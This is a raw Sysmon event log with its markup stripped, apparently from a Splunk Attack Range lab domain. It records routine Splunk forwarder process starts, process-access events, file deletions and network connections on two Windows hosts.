07:47:50.729{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047190Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:50.729{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047189Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:50.729{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047188Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:50.729{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F3A6-60EB-067D-00000000CF01}9596C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047187Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:50.729{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F3A6-60EB-067D-00000000CF01}9596C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047186Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:50.716{466BC892-F3A6-60EB-067D-00000000CF01}9596C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001047185Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:42.796{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50958-false10.0.1.12-8000- 354300x80000000000000001047184Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:42.250{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse84.242.35.58static-host-84-242-35-58.awasr.om56340-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 10341000x80000000000000001047183Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:50.414{466BC892-F3A6-60EB-057D-00000000CF01}19402008C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001047182Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:50.383{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=148DD137428839E587335EFAF7577994,SHA256=8A89D255A740719988706D1B524DA8DD32CDB1EA5B2E4ADDB534F899CA11D01C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806761Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:49.401{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57206-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806760Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:50.191{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07DEF48B1CBEA9847130274313A19A73,SHA256=9E3CCD713ACF68ED4D6878C7661F295177729FA49375D2505D71B71A2CBE5AE7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047181Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:50.267{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=88B7A9A6F34AB5ABAE6618600C181EA4,SHA256=74EDC32F77B2A488E6445246D4EC3639EC11F6BF7BB537C267982F39F16C8804,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047180Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:50.265{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A6B014ED0940D12E251C3B2E5AB5ED56,SHA256=BC0C0AE815C90B3E5DDBE7118A4C0C534E23D9DA5017381283B3B45CE2C910CC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047179Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:50.199{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F3A6-60EB-057D-00000000CF01}1940C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047178Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:50.199{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047177Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:50.199{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047176Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:50.199{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047175Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:50.199{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047174Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:50.199{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F3A6-60EB-057D-00000000CF01}1940C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047173Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:50.199{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F3A6-60EB-057D-00000000CF01}1940C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047172Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:50.184{466BC892-F3A6-60EB-057D-00000000CF01}1940C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001047205Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:51.728{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=88B7A9A6F34AB5ABAE6618600C181EA4,SHA256=74EDC32F77B2A488E6445246D4EC3639EC11F6BF7BB537C267982F39F16C8804,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047204Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:51.597{466BC892-F3A7-60EB-077D-00000000CF01}96688124C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047203Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:51.413{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F3A7-60EB-077D-00000000CF01}9668C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047202Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:51.397{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047201Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:51.397{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047200Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:51.397{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047199Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:51.397{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047198Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:51.397{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F3A7-60EB-077D-00000000CF01}9668C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047197Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:51.397{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F3A7-60EB-077D-00000000CF01}9668C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001047196Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:51.398{466BC892-F3A7-60EB-077D-00000000CF01}9668C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001047195Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:51.397{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 